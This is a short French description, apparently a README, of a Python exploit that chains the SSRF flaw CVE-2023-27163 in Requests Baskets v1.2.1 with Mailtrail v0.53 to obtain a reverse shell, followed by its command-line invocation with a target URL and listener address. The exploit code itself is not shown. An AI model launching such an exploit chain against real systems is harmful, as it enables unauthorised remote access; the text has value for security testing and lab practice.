
Exploit Python enchaînant la SSRF CVE-2023-27163 dans Requests Baskets avec Mailtrail v0.53 pour rediriger les services internes et exécuter un reverse shell.
L'exploit suivant abuse de la vulnérabilité SSRF de Requests Baskets v1.2.1 pour rediriger l'application interne s'exécutant sur 127.0.0.1:80 vers l'application externe à /pwned. Une fois que l'application Mailtrail v0.53 a été redirigée, elle exécutera une commande de reverse shell contre elle et en quelques secondes l'utilisateur devrait obtenir un reverse shell sur la machine.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT